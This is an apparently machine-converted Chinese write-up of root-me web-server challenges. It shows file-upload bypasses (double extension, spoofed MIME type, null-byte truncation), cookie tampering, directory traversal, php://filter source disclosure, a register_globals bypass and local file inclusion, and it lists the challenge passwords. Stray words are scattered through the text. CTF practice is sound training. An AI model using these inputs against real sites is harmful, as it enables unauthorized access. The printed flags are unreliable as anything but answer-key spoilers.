root-me web server 10-20 writeup

時間 2019-11-26

標籤 root web server writeup 欄目 Linux 简体版

原文原文鏈接

File upload - double extensions文件上傳——雙擴展

Gallery v0.02php

介紹html

Your goal is to hack this photo galery by uploading PHP code.web

/challenge/web-serveur/ch20/tmp/phpSfAkKz 訪問無果安全

返回cookie

查看源碼session

view-source:http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/ccbde566dbc436aa41b84533bbc60ad8//3.php.jpg?previewapp

刪除ide

http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/ccbde566dbc436aa41b84533bbc60ad8//3.php.jpg函數

PV1OejHY4MxfsC2mHpRz9post

File upload - MIME type

常見的MIME類型　　超文本標記語言文本 .html text/html 　　xml文檔 .xml text/xml 　　XHTML文檔 .xhtml application/xhtml+xml 　　普通文本 .txt text/plain 　　RTF文本 .rtf application/rtf 　　PDF文檔 .pdf application/pdf 　　Microsoft Word文件 .word application/msword 　　PNG圖像 .png image/png 　　GIF圖形 .gif image/gif 　　JPEG圖形 .jpeg,.jpg image/jpeg 　　au聲音文件 .au audio/basic 　　MIDI音樂文件 mid,.midi audio/midi,audio/x-midi 　　RealAudio音樂文件 .ra, .ram audio/x-pn-realaudio 　　MPEG文件 .mpg,.mpeg video/mpeg 　　AVI文件 .avi video/x-msvideo 　　GZIP文件 .gz application/x-gzip 　　TAR文件 .tar application/x-tar 　　任意的二進制數據 application/octet-stream

Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/gif

查看源碼

抓包

刪除
http://challenge01.root-me.org/web-serveur/ch21/galerie/upload/cb13dd644fb605082b0a59f2d15c84e7//2.php

password : UN2YusYPnmwfHFHI5zj3

HTTP cookies

Bob create a script to gather user’s email...

PS : Bob really love cookies

ctrl+u

<!--SetCookie("ch7","visiteur");

輸入test

點擊Saved email adresses

You need to be admin

用live http heads 抓取數據包

Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challenge01.root-me.org/web-serveur/ch7/
Cookie: ch7=visiteur
X-Forwarded-For: 8.8.8.8

修改Cookie: ch7=visiteur
Cookie: ch7=admin

replay

刷新

Validation password : ml-SYMPA

Directory traversal-目錄遍歷

Photo gallery v 0.01

Find the hidden section of the photo galery.

刪除ch15.php

burp爬目錄

發現有ch15/galerie/86hwnX2r/password.txt

點擊便可

http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt

kcb$!Bx@v4Gs9Ez

File upload - null byte

%00-零零截斷

Gallery v0.04

Your goal is to hack this photo galery by uploading PHP code.

上傳2.php

再上傳3.php.jpeg

3.php%00.jpg

這樣的話，系統就會把.jpeg後面的給捨去。直接解析3.php了

點擊剛纔上傳的圖片

Well done ! You can validate this challenge with the password : YPNchi2NmTwygr2dgCCF

PHP filters-php函數

Retrieved the administrator password of this application.

PHP 過濾器用於對來自非安全來源的數據（好比用戶輸入）進行驗證和過濾。

連接

url

連接

PD9waHAKaW5jbHVkZSgiY29uZmlnLnBocCIpOwoKaWYgKCBpc3NldCgkX1BPU1RbInVzZXJuYW1lIl0pICYmIGlzc2V0KCRfUE9TVFsicGFzc3dvcmQiXSkgKXsKICAgIGlmICgkX1BPU1RbInVzZXJuYW1lIl09PSR1c2VybmFtZSAmJiAkX1BPU1RbInBhc3N3b3JkIl09PSRwYXNzd29yZCl7CiAgICAgIHByaW50KCI8aDI+V2VsY29tZSBiYWNrICE8L2gyPiIpOwogICAgICBwcmludCgiVG8gdmFsaWRhdGUgdGhlIGNoYWxsZW5nZSB1c2UgdGhpcyBwYXNzd29yZDxici8+PGJyLz4iKTsKICAgIH0gZWxzZSB7CiAgICAgIHByaW50KCI8aDM+RXJyb3IgOiBubyBzdWNoIHVzZXIvcGFzc3dvcmQ8L2gyPjxiciAvPiIpOwogICAgfQp9IGVsc2Ugewo/PgoKPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgTG9naW4mbmJzcDs8YnIvPgogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VybmFtZSIgLz48YnIvPjxici8+CiAgUGFzc3dvcmQmbmJzcDs8YnIvPgogIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIC8+PGJyLz48YnIvPgogIDxici8+PGJyLz4KICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY29ubmVjdCIgLz48YnIvPjxici8+CjwvZm9ybT4KCjw/cGhwIH0gPz4=
解碼
<?php
include("config.php");

if ( isset($_POST["username"]) && isset($_POST["password"]) ){
if ($_POST["username"]==$username && $_POST["password"]==$password){
print("

Welcome back !

");
print("To validate the challenge use this password

");
} else {
print("

Error : no such user/password

");
}
} else {
?>

<?php } ?>

include("config.php");

url2

PD9waHAKCiR1c2VybmFtZT0iYWRtaW4iOwokcGFzc3dvcmQ9IkRBUHQ5RDJta3kwQVBBRiI7Cgo/Pg==

<?php

$username="admin";
$password="DAPt9D2mky0APAF";

PHP register globals

It seems that the developper often leaves backup files around...

http://challenge01.root-me.org/web-serveur/ch17/index.php?_SESSION[logged]=1

well done, you can validate with the password : NoiQYdpcd5kgNwG

Local File Inclusion-本地文件包含

PHP文件包含漏洞的產生緣由是在經過PHP的函數引入文件時，因爲傳入的文件名沒有通過合理的校驗，從而操做了預想以外的文件，就可能致使意外的文件泄露甚至惡意的代碼注入
Abbreviated LFI

Get in the admin section.

查看標籤中的子標籤的連接
http://challenge01.root-me.org/web-serveur/ch16/?files=reseau&f=index.html
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=index.html
http://challenge01.root-me.org/web-serveur/ch16/?files=esprit&f=index.html

發現變量files是標籤的一個變量和f下屬標籤的變量

因此

目錄遍歷

http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=index.html

在index.php裏面

if (isset($_GET["files"])) $files=$_GET["files"];

if (isset($_GET["f"]) && $_GET["f"]!="")

http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=admin/index.php

users = array('admin' => 'OpbNJ60xYpvAQU8');